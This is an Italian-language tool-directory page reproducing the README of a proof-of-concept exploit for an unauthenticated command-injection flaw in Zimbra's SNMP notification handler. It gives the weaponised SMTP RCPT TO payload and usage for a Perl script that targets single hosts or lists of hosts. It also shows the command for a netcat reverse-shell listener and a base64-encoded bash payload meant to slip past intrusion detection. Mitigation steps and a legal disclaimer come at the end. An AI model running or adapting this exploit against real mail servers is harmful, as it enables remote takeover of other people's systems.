Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-73570 — Zimbra SNMP Notification OS Command Injection — RCE non autenticato tramite exploit SMTP (Poc) | Kitploit
Strumenti/GitHubGitHub/gabrielunknown/cve-2026-73570
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubgabrielunknown/cve-2026-73570

CVE-2026-73570

Zimbra SNMP Notification OS Command Injection — RCE non autenticato tramite exploit SMTP (Poc)

Vedi Repository
11 giorno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-73570 — Exploit RCE tramite notifica SNMP di Zimbra ZCS (PoC)

Esecuzione remota di codice non autenticata tramite iniezione di comandi nel sistema operativo nel gestore delle notifiche SNMP di Zimbra Collaboration Suite.


Panoramica

CampoValore
CVECVE-2026-73570
CVSS 3.18.9 ALTO — AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
CWECWE-78 — Neutralizzazione impropria di elementi speciali usati in un comando del sistema operativo
InteressatiZimbra ZCS < 10.1.20 (con zimbra-snmp installato)
Corretto inZCS 10.1.20 — luglio 2026
CISA KEVAggiunto 2026-08-21 (scadenza rimedio FCEB: 2026-08-24)
Auth richiestaNessuna
Esecuzione comeutente OS zimbra

Causa principale

Il pacchetto opzionale zimbra-snmp include una regola swatchdog che monitora /var/log/zimbra.log per righe corrispondenti a:

root@kitploit:~
Service status change: <NAME> changed from <STATE> to <STATE>

Quando viene trovata una corrispondenza, swatchdog passa il campo <NAME> catturato direttamente allo script di shell di notifica SNMP senza alcuna sanificazione.

Un attaccante non autenticato può iniettare una voce di log appositamente costruita inviando un comando SMTP RCPT TO formattato ad hoc. Utilizzando una parte locale tra virgolette RFC 5321, metacaratteri di shell — ad es. $(...) — vengono incorporati all'interno di <NAME> e vengono eseguiti quando swatchdog elabora la riga di log risultante.


Pre-condizioni

Tutte e tre le condizioni devono essere vere sul target affinché la vulnerabilità sia sfruttabile:

  • Il pacchetto zimbra-snmp è installato
  • Le notifiche SNMP sono abilitate (snmp_notify = true)
  • Il servizio swatchdog è in esecuzione

Flusso dell'attacco

root@kitploit:~
Attaccante                          Zimbra MTA
   │                                  │
   │── TCP connect :25/:465/:587 ────►│
   │── EHLO mx-test.invalid ─────────►│
   │── MAIL FROM:<scanner@...> ──────►│
   │── RCPT TO:<"x: Service status    │
   │     change: localhost $(CMD)     │
   │     changed from stopped to      │
   │     running"@cve.invalid> ──────►│
   │                                  │── registra dati RCPT TO ──► /var/log/zimbra.log
   │                                  │                               │
   │                                  │                         swatchdog trova
   │                                  │                         corrispondenza,
   │                                  │                         estrae
   │                                  │                         $(CMD), esegue
   │◄─────────── callback di shell ───────────────────────────────────────┘
  1. Connettersi alla porta 25 / 465 / 587.
  2. Inviare una conversazione SMTP standard con il RCPT TO armato.
  3. Zimbra registra i dati dell'indirizzo indipendentemente da accettazione/rifiuto.
  4. swatchdog trova la corrispondenza nel pattern di log ed estrae il $(CMD) iniettato.
  5. Il gestore SNMP esegue CMD come utente OS zimbra.

Exploit

Requisiti

root@kitploit:~
cpan IO::Socket::SSL MIME::Base64 Digest::HMAC_MD5

Target singolo

root@kitploit:~
perl zimbra-poc.pl -H mail.target.com -r <YOUR_IP> -R 4444

Elenco di target

root@kitploit:~
perl zimbra-poc.pl -f targets.txt -r <YOUR_IP> -R 4444

targets.txt — un host per riga, :porta opzionale, le righe che iniziano con # vengono ignorate:

root@kitploit:~
mail.example.com
mail.example.com:25
10.0.0.50:587
# commento ignorato

Tutte le opzioni

FlagLongDefaultDescrizione
-H--host—Hostname o IP del target singolo
-f--file—File contenente l'elenco dei target
-p--port587Porta SMTP predefinita
-r--rhost—Il tuo IP per il callback della reverse shell
-R--rport4444Porta del listener
-t--timeout15Timeout del socket in secondi
-S--ssloffTLS diretto (auto-abilitato sulla porta 465)
-v--verboseoffStampa l'intero dialogo SMTP
-L--logfile—Scrive il log della sessione su file
-h--help—Mostra l'aiuto

Esempio completo

root@kitploit:~
# Terminale 1 — avvia il listener
nc -lvnp 4444

# Terminale 2 — esegui l'exploit
perl zimbra-poc.pl -H mail.target.com -r 10.10.10.1 -R 4444 -v

Tecnica del payload

Il comando della reverse shell viene codificato in base64 prima dell'iniezione:

root@kitploit:~
echo <b64>|base64 -d|bash

Questo impedisce a IDS/IPS di rilevare firme in testo semplice come /dev/tcp, bash -i o nc -e. Il blob codificato viene iniettato come $(...) all'interno della parte locale tra virgolette di RCPT TO, attivando l'esecuzione lato server quando swatchdog elabora la voce di log.


Mitigazione

AzioneDettaglio
PatchAggiornare a Zimbra ZCS ≥ 10.1.20
Disabilitare notifica SNMPzmprov mcf zimbraSnmpNotifyEnabled FALSE && zmconfigdctl restart
Rimuovere il pacchettoapt remove zimbra-snmp / yum remove zimbra-snmp
Controlli di reteLimitare la SMTP in ingresso (25/465/587) a relay fidati dove operativamente fattibile

Riferimenti

  • NVD — CVE-2026-73570
  • Avvisi di sicurezza Zimbra
  • Vulnerabilità note sfruttate CISA — CVE-2026-73570
  • Avviso CERT.pl
  • BiuTrap/CVE-2026-73570

Disclaimer

Questa proof-of-concept è rilasciata esclusivamente per test di sicurezza autorizzati, ricerca accademica e scopi difensivi.
Eseguirla contro sistemi di cui non si è proprietari o per i quali non si dispone di esplicita autorizzazione scritta al test è illegale.
L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo strumento.


Scarica lo strumento